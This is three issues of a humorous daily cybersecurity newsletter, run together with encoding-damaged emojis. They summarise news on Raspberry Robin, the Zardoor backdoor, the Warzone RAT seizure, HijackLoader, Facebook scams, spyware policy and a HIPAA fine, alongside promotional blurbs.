Welcome to Gone Phishing, your daily cybersecurity newsletter thatโ€™s leaving the cybercriminals in the dust like Trump is Biden ๐Ÿ™ˆ Or maybe heโ€™s just Biden his time ๐Ÿ˜

Todayโ€™s hottest cybersecurity news stories:

  • โš ๏ธ Watch out for Raspberry Robin malware spreading Discord ๐Ÿค

  • ๐Ÿ•‹ General Zardoor targets Islamic charity organisation via backdoor ๐Ÿšช

  • ๐Ÿ€ I smell a Warzone RAT, DoJ ainโ€™t nothing to f*ck with, arrests made

Raspberry Robin, Rock, Rock, Raspberry Robin ๐ŸŽถ

๐Ÿ”’๐Ÿ–ฅ๏ธ Watch Out: Raspberry Robin Malware Gets Stealthier! ๐Ÿ›‘

Raspberry Robin, the notorious malware family known for facilitating initial access to other malicious payloads, has upped its game with two new one-day exploits for local privilege escalation. ๐Ÿ˜ฑ Check Point's recent report reveals that these exploits are used shortly after being developed, suggesting access to an exploit seller or rapid in-house development.

This evasive malware, attributed to the threat actor Storm-0856, has been on the radar since 2021 and is part of a complex malware ecosystem with ties to prominent e-crime groups like Evil Corp and Silence. ๐Ÿ˜ก It spreads through various vectors, including infected USB drives, acting as a gateway for ransomware and other threats.

What's alarming is Raspberry Robin's use of undisclosed exploits, like CVE-2023-36802, which was advertised on the dark web months before it was publicly disclosed and patched by Microsoft. ๐Ÿ˜จ These exploits are integrated quickly into the malware's arsenal, posing a significant threat to organisations that may not have applied patches.

To make matters worse, the malware now utilises rogue RAR archive files hosted on Discord to gain initial access and has tweaked its lateral movement and C2 communication methods for increased stealth. ๐Ÿ•ต๏ธโ€โ™‚๏ธ This includes switching from PsExec.exe to PAExec.exe for lateral movement and dynamically selecting V3 onion addresses for C2 communication.

Incorporating these changes, Raspberry Robin continues to evolve, making it more challenging to detect and analyse. Vigilance and timely patching remain crucial in defending against such sophisticated threats! ๐Ÿ›ก๏ธ

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Zordoor. The one place in Middle-earth we don't want to see any closer, and the one place we're trying to get to ๐Ÿง™โ€โ™‚๏ธ

๐Ÿšจ๐Ÿ”’ Islamic Non-Profit in Saudi Arabia Targeted by Stealthy Cyber Espionage Campaign! ๐Ÿ’ป๐Ÿ”

An unnamed Islamic non-profit organisation in Saudi Arabia has fallen victim to a sophisticated cyber espionage campaign, where threat actors deployed a previously undocumented backdoor named Zardoor. ๐Ÿ˜ฑ Discovered by Cisco Talos in May 2023, the campaign likely began as early as March 2021 and has flown under the radar, with only one known target identified so far.

Throughout the operation, the attackers utilised living-off-the-land binaries (LoLBins) to maintain long-term access to victim environments discreetly, avoiding detection. ๐Ÿ•ต๏ธโ€โ™‚๏ธ The attack on the Islamic charity involved periodic data exfiltration, with the initial access vector still shrouded in mystery.

Zardoor, the stealthy backdoor deployed for persistence, is orchestrated using open-source reverse proxy tools like FRP, sSocks, and Venom to establish command-and-control connections. ๐Ÿ›ก๏ธ Leveraging Windows Management Instrumentation (WMI) for lateral movement, the threat actor spreads Zardoor across the network, executing commands received from the C2.

The infection pathway involves a dropper component that instals a malicious dynamic-link library ("oci.dll"), unleashing two backdoor modules, "zar32.dll" and "zor32.dll." While "zar32.dll" handles C2 communications, "zor32.dll" ensures administrator privileges for the backdoor. ๐Ÿ˜จ Zardoor's capabilities include data exfiltration, remote execution, IP address updates, and self-deletion.

Despite extensive analysis, the identity and motives of the threat actor remain unknown, with no discernible ties to known cybercriminal groups. ๐Ÿ•ต๏ธโ€โ™€๏ธ The sophistication and stealthiness of the operation indicate the work of an advanced threat actor, posing a significant challenge to detection and mitigation efforts.

Organisations must remain vigilant and bolster their cybersecurity defences against such stealthy and persistent threats! ๐Ÿ›ก๏ธ๐Ÿ”

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

Let me see your Warzone face ๐Ÿ˜ก

๐Ÿ›‘โš ๏ธ U.S. Justice Department Seizes Online Infrastructure Selling Warzone RAT โš ๏ธ๐Ÿ›‘

In a significant move, the U.S. Justice Department (DoJ) has seized online infrastructure linked to the sale of a notorious remote access trojan (RAT) dubbed Warzone RAT. ๐Ÿšจ The domains, including www.warzone[.]ws, were utilised to peddle this malicious software, allowing cybercriminals to clandestinely access and pilfer data from victims' computers.

In a coordinated international effort, law enforcement has apprehended and indicted two individuals in Malta and Nigeria for their roles in promoting and facilitating the use of the malware. ๐Ÿ‘ฎโ€โ™‚๏ธ๐Ÿ‘ฎโ€โ™€๏ธ Daniel Meli (27) and Prince Onyeoziri Odinakachi (31) face charges related to unauthorised access to protected computers, with Meli additionally accused of illegally vending electronic interception devices and conspiring to commit computer intrusion offences.

Meli, operating since 2012, has a history of providing malware services through online forums, including his previous sale of the Pegasus RAT. Odinakachi, on the other hand, provided customer support for Warzone RAT purchasers between June 2019 and March 2023.

Warzone RAT, also known as Ave Maria, operates under the malware-as-a-service (Maas) model, enabling threat actors to steal information and remotely control infected hosts for further exploitation. ๐Ÿ•ต๏ธโ€โ™‚๏ธ Sold for $38 a month, its functionalities include browsing victim file systems, capturing screenshots, recording keystrokes, stealing credentials, and activating webcams without consent.

The FBI, in collaboration with international partners, covertly acquired copies of Warzone RAT, confirming its malicious capabilities. ๐Ÿ•ต๏ธโ€โ™€๏ธ This joint effort involved authorities from Australia, Canada, Croatia, Finland, Germany, Japan, Malta, the Netherlands, Nigeria, Romania, and Europol.

The dismantling of the Warzone RAT infrastructure marks a significant victory in the ongoing battle against cybercrime, demonstrating the effectiveness of global cooperation in combating online threats. ๐Ÿค Organizations are urged to remain vigilant and enhance their cybersecurity measures to safeguard against such malicious activities. ๐Ÿ›ก๏ธ๐Ÿ”’

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!

Google begins blocking, removing dodgy apps

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that delves into the depths of cyber-hell for your benefit like Tucker #Carlson with Putin. Or is the other way around with those two ๐Ÿคท๐Ÿ‘€๐Ÿ˜‚

Itโ€™s Friday, folks, which can only mean one thingโ€ฆ Itโ€™s time for our weekly segment!

It goes by many names. Patch of the Week, Tweak of the week. Okay, thatโ€™s it.

Congrats, the cybercriminals are no matchโ€ฆ for your patch! ๐Ÿฉน๐Ÿฉน๐Ÿฉน

Check out these freshly hatched patches ๐Ÿฃ๐Ÿฃ๐Ÿฃ

Google: These are the โ€˜Droid (patches!) youโ€™re looking for ๐Ÿ˜

๐Ÿšจ Google Fixes Critical Remote Code Execution Flaw With Android ๐Ÿค–

Google dropped the February 2024 Android security patches tackling 46 vulnerabilities, among them, a serious code flaw dubbed CVE-2024-0031 ๐Ÿ› ๏ธ. This bug, nestled in the System, bites at Android Open Source Project (AOSP) versions 11, 12, 12L, 13, and 14 ๐Ÿ“ฑ.

"Source code patches for these issues have been released to the Android Open Source Project (AOSP) repository and linked from this bulletinโ€, according to Google's advisory. It also points to patches outside of AOSP. The most pressing issue, a critical security hole in the System, could allow remote code execution without any extra privileges ๐Ÿšจ.

Google rolled out two sets of patches, dated February 1st and 5th, to address these concerns ๐Ÿ“…. They did this to help partners focus on fixing a chunk of the vulnerabilities, although they suggest tackling all the issues listed in the bulletin. Users are encouraged to apply these patches pronto when they're available, keeping their devices shielded from potential exploits ๐Ÿ”’

Now, on to todayโ€™s hottest cybersecurity stories:

  • ๐Ÿ™…โ€โ™‚๏ธ Google begins blocking, removing dodgy apps in Singapore ๐Ÿœ

  • ๐Ÿ”ฌ Researchers decode HijackLoader malware despite evolution ๐Ÿ’

  • ๐Ÿค• Das Facebook fatal accident scam down but not out. Wunderbar ๐Ÿคฆโ€โ™‚๏ธ

Google be like: โ›” Blocked, โŒ Deleted ๐Ÿ’…๐Ÿ’โ€โ™€๏ธ๐Ÿ’€

๐Ÿ“ฑ Google Launches Fraud Protection Pilot in Singapore!

Google has rolled out a groundbreaking pilot program in Singapore aimed at curbing the abuse of Android app permissions. ๐Ÿšซ The initiative targets apps that exploit sensitive permissions to read one-time passwords and harvest sensitive data for financial fraud.

Under this enhanced fraud protection, users attempting to sideload such apps from internet sources like web browsers, messaging apps, or file managers will be automatically blocked. ๐Ÿ›‘ Google Play Protect will analyse the permissions requested by third-party apps in real-time and prevent the installation of those seeking access to sensitive data.

"These permissions are frequently abused by fraudsters to intercept one-time passwords via SMS or notifications, as well as spy on-screen content," explained Eugene Liderman, Google's director of mobile security strategy. ๐Ÿ‘€

The move comes amidst a collaborative effort to combat mobile fraud, with Google urging app developers to adhere to best practices and review their apps' device permissions to align with Mobile Unwanted Software principles. ๐Ÿ“ฒ๐Ÿ’ก

Google's real-time scanning with Play Protect has already proven effective in detecting and blocking malicious apps, with over 515,000 new malicious apps detected and 3.1 million warnings issued in select markets.

Meanwhile, Apple has announced significant changes to the App Store in the European Union to comply with the Digital Markets Act.ย ๐Ÿ These changes, including Notarization for iOS apps, aim to enhance privacy and security for users. However, Apple warns that distributing iOS apps from alternative sources could expose users to increased risks.

With both tech giants taking proactive measures to safeguard user privacy and security, the battle against mobile fraud continues to evolve. ๐Ÿ›ก๏ธ๐Ÿ’ฐ Yay! Some good news ๐ŸŽ‰

Hijack! Bye Jack ๐Ÿ‘‹๐Ÿ‘€๐Ÿ˜

๐Ÿ” New HijackLoader Malware Variant Packs Stealthy Defense Evasion Tactics! ๐Ÿ›ก๏ธ

Threat actors behind the notorious HijackLoader malware have upped their game with new defence evasion techniques, making it stealthier and more challenging to detect. ๐Ÿ’ป

CrowdStrike researchers uncovered a novel approach where HijackLoader employs a standard process hollowing technique, triggered by the parent process writing to a pipe, enhancing its ability to evade detection. ๐Ÿ•ต๏ธโ€โ™‚๏ธ This evolution marks a significant step forward in the malware's stealth capabilities.

Initially spotted by Zscaler ThreatLabz in September 2023, HijackLoader has since been a favoured tool for cybercriminal groups, facilitating the delivery of DanaBot, SystemBC, and RedLine Stealer. ๐Ÿบ Now, it's being wielded by TA544 to distribute Remcos RAT and SystemBC via phishing emails.

Liviu Arsene from CrowdStrike likened loaders to "wolves in sheep's clothing," emphasising their role in introducing and executing sophisticated threats. ๐Ÿบ๐Ÿ‘ This latest variant of HijackLoader takes this deception to new heights, refining its digital camouflage for enhanced stealth.

The attack chain begins with the execution of "streaming_client.exe," which fetches a second-stage configuration from a remote server. Subsequent steps involve loading a legitimate DLL specified in the configuration and executing HijackLoader's payload using a combination of process doppelgรคnging and process hollowing techniques. ๐Ÿ”„๐Ÿญ

Notably, the malware employs Heaven's Gate to bypass user-mode hooks, injecting shellcode into cmd.exe using transacted hollowing, a technique observed in malware like the Osiris banking trojan. โš ๏ธ This intricate evasion mechanism aims to fly under the radar of traditional security solutions, posing a significant challenge for threat researchers.

As adversaries continue to refine their tactics, the evolution of defence evasion capabilities in HijackLoader underscores the ongoing arms race between cybercriminals and security professionals. ๐Ÿš€ Stay vigilant and keep evolving your defences!

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Donโ€™t fall Facebook, line, and sinker ๐Ÿ˜ฌ๐Ÿ˜ฌ๐Ÿ˜ฌ

๐Ÿšจ Watch Out for Fabled Facebook Fatal Accident Scam (now in German!) โš ๏ธ

Facebook's battle against a persistent malvertising campaign has spilled over into the German language, with cybercriminals finding new ways to deceive users. ๐Ÿ˜ฑ

The first scam involves a fake fundraiser post about a "Tรถdlicher Verkehrsunfall" (Deadly Traffic Accident), tugging at heartstrings with false claims of highway fatalities. ๐Ÿ˜ก This sneaky tactic prevents users from commenting, making it harder to warn others.

Upon investigation, it's revealed that compromised accounts are used to spread this scam, often accompanied by Messenger messages urging users to click suspicious links. ๐Ÿ•ต๏ธโ€โ™‚๏ธ These links, despite appearing legitimate with "googleapis.com," are actually used for phishing and tech support scams, analysing user data to tailor fraudulent activities.

In a similar vein, another scam featuring a California ambulance and motorcycle wreck masquerades as a German incident, complete with grammatical errors. ๐Ÿš‘โŒ Users who try to access these scams from Germany are thwarted by VPN detection, highlighting the criminals' efforts to evade detection.

The malvertising campaign doesn't stop there; it also employs browser push notifications, leading users to explicit content, scam sites, and gambling platforms.ย ๐Ÿ˜ค These tactics are designed to lure unsuspecting victims into fraudulent schemes.

So, how can you protect yourself from falling victim to these scams? ๐Ÿค” First, be cautious of posts tagging multiple friends and promising videos. If your account is compromised, take immediate action: remove unknown Facebook apps, enable two-factor authentication, and change your password.

Vigilance is key to staying safe in the ever-evolving landscape of online threats! Another solution, of course, is to abstain from Facebook entirely. Delete your account, even. And all other social mediaโ€ฆ Hehe, enjoy your weekend folks and stay safe out there!! ๐Ÿ›ก๏ธ๐Ÿ›ก๏ธ๐Ÿ›ก๏ธ

Peace out โœŒ๏ธ

๐Ÿ—ž๏ธ Extra, Extra! Read all about it! ๐Ÿ—ž๏ธ

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think.

So long and thanks for reading all the phish!

footer graphic cyber security newsletter
  • ๐ŸŒต CACTUS ransomware exploits flaws in Qlik Sense ๐Ÿ’ป

Tech giants and global coalition unite against spyware abuse

.bh__table, .bh__table_header, .bh__table_cell { border: 1px solid #C0C0C0; }
.bh__table_cell { padding: 5px; background-color: #FFFFFF; }
.bh__table_cell p { color: #2D2D2D; font-family: ‘Helvetica’,Arial,sans-serif !important; overflow-wrap: break-word; }
.bh__table_header { padding: 5px; background-color:#F1F1F1; }
.bh__table_header p { color: #2A2A2A; font-family:’Trebuchet MS’,’Lucida Grande’,Tahoma,sans-serif !important; overflow-wrap: break-word; }

Gone Phishing Banner

Welcome to Gone Phishing, your daily cybersecurity newsletter that floats like a butter-cy and stings like a cyber-bee ๐Ÿ๐Ÿ˜‚๐Ÿ™ƒ

Todayโ€™s hottest cybersecurity news stories:

  • ๐Ÿค– Tech giants and global coalition unite against spyware abuse ๐Ÿ•ต๏ธ

  • ๐Ÿ‘จ๐Ÿพ Forget MaaS immigration, Maas is top threat to organisations ๐ŸŒ

  • ๐Ÿ‘จโ€โš•๏ธ Failed their HIPAAcratic oath! Medical Center Fined $4.75M ๐Ÿ’ฐ

CybeAvengers Unite ๐ŸฆธโœŠ๐Ÿ’ฅ

๐Ÿ›ก๏ธ Global Effort to Curb Spyware Abuse Unveiled! ๐Ÿค๐Ÿ’ผ

Countries like France, the U.K., and the U.S., joined by tech giants such as Google, Meta, and Microsoft, unite against commercial spyware misuse in the Pall Mall Process. Their aim? To rein in the proliferation of cyber intrusion tools and establish guidelines for responsible development and use.

โš ๏ธ The initiative warns of the dangers posed by spyware, which can infiltrate devices without user interaction, posing threats to privacy, human rights, and digital security. Thousands fall victim to spyware attacks yearly, with malicious actors exploiting vulnerabilities to gather sensitive information.

๐ŸŒŽ While the move highlights global cooperation, the absence of certain nations like Israel and Hungary raises questions. The action also coincides with the U.S. Department of State's visa denials for those linked to spyware misuse, signalling a broader crackdown.

๐Ÿ•ต๏ธ Commercial spyware, such as Chrysaor and Pegasus, designed for legitimate use, often ends up in the wrong hands, targeting journalists, activists, and dissidents. Despite efforts to contain the spyware ecosystem, the battle persists, with tech firms tracking numerous vendors and exploits.

Let's stay vigilant and work together to protect against cyber threats! ๐Ÿšจ๐Ÿ”’

Learn AI in 5 minutes a day. We'll teach you how to save time and earn more with AI. Join 400,000+ free daily readers for trending tools, productivity boosting prompts, the latest news, and more.

Opiate of the MaaSes ๐Ÿค“

๐Ÿ›ก๏ธ Darktrace Report: MaaS Reigns Supreme in 2023 Threat Landscape! ๐Ÿšจ๐Ÿ’ป

The 2023 End of Year Threat Report by Darktrace sounds the alarm on Malware-as-a-Service (MaaS) infections, emerging as the top threat to organisations in the latter half of the year.

Malware strains like ViperSoftX and Black Basta showcase a menacing trend of combining multiple functions, making detection a formidable challenge for defenders. ๐Ÿ˜ฑ

๐Ÿ ViperSoftX, a notorious info stealer and RAT, evolved with sophisticated evasion tactics, targeting sensitive data such as crypto wallets and browser passwords. Meanwhile, Black Basta ransomware spreads alongside Qbot banking trojan for credential theft.

๐Ÿ’ฐ The rise of Ransomware-as-a-Service (RaaS) in the wake of Hive ransomware's takedown spells trouble ahead.ย ๐Ÿ“ˆ Darktrace predicts a surge in double and triple extortion tactics, fueled by the expanding arsenal of multi-functional malware.

๐Ÿค– Moreover, attackers are leveraging AI to craft more convincing phishing campaigns, bypassing traditional security measures with alarming success rates. ๐ŸŽฃ

As cyber threats grow in complexity, organisations face an uphill battle to stay protected. With MaaS and RaaS on the rise, the cybersecurity landscape remains fraught with challenges in 2024. ๐Ÿ›ก๏ธ๐Ÿ”’

๐ŸŽฃ Catch of the Day!! ๐ŸŒŠ๐ŸŸ๐Ÿฆž

๐Ÿƒย The Motley Fool: โ€œFool me once, shame on โ€” shame on you. Fool me โ€” you can't get fooled again.โ€ Good olโ€™ George Dubya ๐Ÿ˜‚ Let us tell whoโ€™s not fooling around though; thatโ€™s the Crรผe ๐Ÿ‘€ at Motley Fool. Youโ€™d be a fool (alright, enough already! ๐Ÿ™ˆ) not to check out their Share Tips from time to time so your savings can one day emerge from their cocoon as a beautiful butterfly! ๐Ÿ› Kidding aside, if you check out their website theyโ€™ve actually got a ton of great content with a wide variety of different investment ideas to suit most budgets ๐Ÿค‘ย (LINK)


๐Ÿšตย Wander: Find your happy place. Cue Happy Gilmore flashback ๐ŸŒ๏ธโ›ณ๐ŸŒˆ๐Ÿ•Š๏ธ Mmmm Happy Placeโ€ฆ ๐Ÿ˜‡ So, weโ€™ve noticed a lot of you guys are interested in travel. As are we! We stumbled upon this cool company that offers a range of breath-taking spots around the United States and, honestly, the website alone is worth a gander. When all you see about the Land of the free and the home of the brave is news of rioting, looting and school shootings, itโ€™s easy to forget how beautiful some parts of it are. The awe-inspiring locations along with the innovative architecture of the hotels sets Wander apart from your run of the mill American getaway ๐Ÿž๏ธ๐Ÿ˜ย (LINK)


๐ŸŒŠย Digital Ocean: If you build it they will come. Nope, weโ€™re not talking about a baseball field for ghosts โšพ๐Ÿ‘ป๐Ÿฟ (Great movie, to be fair ๐Ÿ™ˆ). This is the Digital Ocean whoโ€™ve got a really cool platform for building and hosting pretty much anything you can think of. If you check out their website youโ€™ll find yourself catching the buzz even if you canโ€™t code (guilty ๐Ÿ˜‘). But if you can and youโ€™re looking for somewhere to test things out or launch something new or simply enhance what youโ€™ve got, weโ€™d recommend checking out their services foโ€™ sho ๐Ÿ˜‰ And how can you not love their slogan: Dream it. Build it. Grow it. Right on, brother! ๐ŸŒฟย (LINK)

Yeah, but I gotta fake (medical) ID thoughโ€ฆ ๐ŸŽถ

๐Ÿšจ HIPAA Violation: NYC Medical Center Fined $4.75M! ๐Ÿ’ธ

Federal regulators have slapped Montefiore Medical Center with a hefty fine of $4.75 million following a data breach dating back to 2013. ๐Ÿ˜ฑ The settlement, announced by the U.S. Department of Health and Human Services' Office for Civil Rights (HHS OCR), stems from "data security failures" that allowed an insider to steal and sell patients' protected health information.

The breach went undetected for years until the New York Police Department uncovered evidence in 2015, prompting an internal investigation by Montefiore. It was revealed that an employee had stolen the electronic health records of thousands of patients and sold them to an identity theft ring. ๐Ÿ˜ก

OCR's investigation found multiple HIPAA Security Rule violations, including failures to analyse and identify risks to PHI, monitor and safeguard health information systems, and implement proper policies and procedures for PHI protection. ๐Ÿ•ต๏ธโ€โ™‚๏ธ

"Unfortunately, we are living in a time where cyberattacks from malicious insiders are not uncommon," said HHS OCR Director Melanie Fontes Rainer, emphasising the critical need for robust cybersecurity measures in the healthcare sector. ๐Ÿ’ช

In addition to the financial penalty, Montefiore has agreed to implement a corrective action plan, including conducting a thorough security risk analysis, implementing audit controls, and providing comprehensive training on HIPAA rules for its workforce. ๐Ÿ›ก๏ธ๐Ÿ”’

Montefiore, in response, highlighted its commitment to patient privacy and cybersecurity, emphasising the steps taken to enhance security protocols and reinforce staff training since the incident. ๐Ÿ‘ฉโ€โš•๏ธ๐Ÿ”

As healthcare systems remain prime targets for cyberattacks, Montefiore vows to remain vigilant in protecting patient information and upholding safety protocols. ๐Ÿฅ๐Ÿ’ป

Catch up tomorrow cyber squad ๐Ÿ‘

๐Ÿ—ž๏ธ Extra, Extra! Read all about it!

Every few weeks, we carefully select three hot newsletters to show you. Reputation is everything, so any links we share come from personal recommendation or carefully researched businesses at the time of posting. Enjoy!

  • The GeekAI: A daily 3 min newsletter on what matters in AI, with all the new AI things coming to market its good to stay ahead of the curve.

  • Wealthy Primate: Want to earn over $100k a year in IT or cybersecurity? 20 year veteran 'Wealthy Primate' might be able to help you climb that tree ๐Ÿ’๐ŸŒด with his stick and banana approach ๐ŸŒ๐Ÿ˜

  • Techspresso:ย Receive a daily summary of the most important AI and Tech news, selected from 50+ media outlets (The Verge, Wired, Tech Crunch etc)

Let us know what you think!

So long and thanks for reading all the phish!